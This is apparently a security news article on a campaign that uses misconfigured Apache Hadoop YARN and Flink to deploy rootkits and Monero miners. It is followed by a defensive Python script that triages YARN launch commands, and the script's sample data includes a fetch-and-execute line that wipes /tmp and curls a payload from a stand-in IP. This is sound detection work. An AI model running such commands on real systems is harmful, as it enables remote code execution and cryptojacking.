Cybersecurity researchers have discovered a new attack that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners in targeted environments.
“This attack is of particular interest due to the attackers’ use of packers and rootkits to hide the malware,” Aqua security researchers Nitzan Yaakov and Assaf Morag said in an analysis published earlier this week. “The malware deletes the contents of specific directories and modifies system configurations to evade detection.”
The infection chain for Hadoop exploits a misconfiguration in the YARN (Yet Another Resource Negotiator) ResourceManager, the component responsible for tracking resources in the cluster and scheduling applications.
Specifically, an unauthenticated remote threat actor can exploit the misconfiguration to execute arbitrary code via crafted HTTP requests, with the resulting privileges depending on the permissions of the user under which the code runs on the node.
Likewise, attacks against Apache Flink target misconfigurations that allow remote attackers to execute code without any authentication.
These misconfigurations are not new and have been exploited in the past by financially motivated groups such as TeamTNT, which is known for its targeting of Docker and Kubernetes environments for cryptojacking and other malicious activities.
But the latest set of attacks is notable for using rootkits to hide the cryptocurrency mining process after gaining an initial foothold in Hadoop and Flink applications.
“The attacker sends an unauthenticated request to deploy a new application,” the researchers explained. “The attacker is able to run remote code by sending a POST request to YARN, requesting that the new application be launched using the attacker’s command.”
This command is specifically used to clear all existing contents of the /tmp directory, get a file named “dca” from the remote server and execute it, and then delete all files in the /tmp directory again.
The executed payload is a packed ELF binary that acts as a downloader to retrieve both rootkit and Monero cryptocurrency miner binaries. It is worth pointing out that various adversaries, including Kinsing, have resorted to using rootkits to hide the existence of the mining process.
For persistence, a cron job is created to download and execute the shell script that deploys the “dca” binary. Further analysis of the threat actor’s infrastructure revealed that the temporary server used to obtain the downloader was registered on October 31, 2023.
As a mitigation measure, it is recommended that organizations deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packed binaries, and other suspicious runtime behavior.
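As an added example (not code from the article or from Aqua), the following Python script triages YARN application launch commands against the stages of the chain described above: wiping /tmp, fetching a remote payload, executing it from /tmp, and adding a cron entry. It assumes the launch commands have already been collected into a list of records (for example from the NodeManager's container launch scripts); the application IDs, users, commands and the 198.51.100.7 address are constructed sample data.

```python
import re

# Indicators derived from the chain described above: wipe /tmp, fetch a payload
# from a remote host, make it executable and run it from /tmp, wipe /tmp again,
# and add a cron entry for persistence.
INDICATORS = {
    "wipes_tmp": re.compile(r"\brm\s+-[a-zA-Z]*f[a-zA-Z]*\s+/tmp(/\*)?(\s|;|&|$)"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b[^;&|]*https?://"),
    "runs_from_tmp": re.compile(r"(^|[;&|]\s*)(chmod\s+\S*x\S*\s+)?/tmp/[\w.-]+"),
    "cron_persist": re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron"),
}


def classify(command):
    """Return the names of the indicators that match one launch command."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def triage(apps, min_hits=2):
    """Return (app_id, user, indicators) for every application whose launch
    command matches at least `min_hits` distinct indicators.  A single hit
    (e.g. a wget of an internal artifact) is common in legitimate jobs, so
    the default threshold requires two stages of the chain to line up."""
    flagged = []
    for app in apps:
        hits = classify(app["command"])
        if len(hits) >= min_hits:
            flagged.append((app["id"], app["user"], hits))
    return flagged


# Constructed sample records (hypothetical IDs and commands; the IP is from the
# 198.51.100.0/24 documentation range, not a real indicator).  "dr.who" is the
# identity Hadoop assigns to unauthenticated web requests in a default config.
SAMPLE_APPS = [
    {"id": "application_1700000000000_0001", "user": "etl",
     "command": "/usr/bin/spark-submit --class org.example.Job hdfs:///jobs/etl.jar"},
    {"id": "application_1700000000000_0002", "user": "dr.who",
     "command": "rm -rf /tmp/* ; curl -s http://198.51.100.7/dca -o /tmp/dca ; "
                "chmod +x /tmp/dca ; /tmp/dca ; rm -rf /tmp/*"},
    {"id": "application_1700000000000_0003", "user": "etl",
     "command": "wget http://artifacts.internal/etl.jar -O /tmp/etl.jar && "
                "hadoop jar /tmp/etl.jar"},
]

if __name__ == "__main__":
    for app_id, user, hits in triage(SAMPLE_APPS):
        print(f"{app_id} submitted by {user}: {', '.join(hits)}")
```

The third record shows why the threshold matters: a legitimate job that pulls a jar from an internal artifact server trips only one indicator and is not flagged.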